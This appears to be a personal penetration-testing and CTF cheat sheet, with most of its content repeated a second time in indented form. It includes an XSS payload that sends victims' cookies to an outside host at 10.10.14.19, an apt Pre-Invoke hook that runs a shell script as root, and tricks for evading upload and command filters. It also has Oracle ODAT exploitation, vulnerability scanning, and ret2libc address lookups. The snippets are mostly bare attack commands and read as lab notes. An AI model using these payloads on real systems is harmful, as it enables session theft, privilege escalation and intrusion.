Feng Zhe feng-zhe

## rsa_egcd.py
#!/usr/bin/python
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

import binascii, base64

p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41

## oracle database exploit
# tools
odat.py
--sysdba

## XSS
<script>
document.write('<img src="http://10.10.14.19/xxxx?cookie=' + document.cookie + '" />')
</script>

## upload file filtering
jpg.php, php.jpg, php5, php6, php7

## web command escaping
/usr/bin/find replaced by /usr/bin/fin? or /usr/bin/\f\i\n\d

## apt pre-invoke attack
If apt update is run, the scripts in /etc/apt/apt.conf.d/ also gets run.

So, if there is a job running apt update, we can put a file with following content under /etc/apt/apt.conf.d/:

APT::Update::Pre-Invoke {"/bin/bash /tmp/myshell.sh"}

## copy to clipboard
cat checker.py | xclip -selection primary

## PenTest Recouses
methodology
http://www.0daysecurity.com/penetration-testing/enumeration.html

## scan
nmap -A -oA xxx <ip>

nmap --script vuln <ip>
=> scan with vuln scripts

nc -zv 192.168.0.1 1-100 2>&1 | grep -v "refused"

## gdb
r < <(python exp.py)
(or 'set args' if take parameters)

r < input.txt

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'

p system => address of function system
	#!/usr/bin/python
	## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
	# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	import binascii, base64

	p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
	q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
	e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
	<script>
	document.write('<img src="http://10.10.14.19/xxxx?cookie=' + document.cookie + '" />')
	</script>
	If apt update is run, the scripts in /etc/apt/apt.conf.d/ also gets run.

	So, if there is a job running apt update, we can put a file with following content under /etc/apt/apt.conf.d/:

	APT::Update::Pre-Invoke {"/bin/bash /tmp/myshell.sh"}
	methodology
	http://www.0daysecurity.com/penetration-testing/enumeration.html
	nmap -A -oA xxx <ip>

	nmap --script vuln <ip>
	=> scan with vuln scripts

	nc -zv 192.168.0.1 1-100 2>&1 \| grep -v "refused"
	r < <(python exp.py)
	(or 'set args' if take parameters)

	r < input.txt

	readelf -s /lib/i386-linux-gnu/libc.so.6 \| grep exit

	strings -a -t x /lib/i386-linux-gnu/libc.so.6 \| grep '/bin/sh'

	p system => address of function system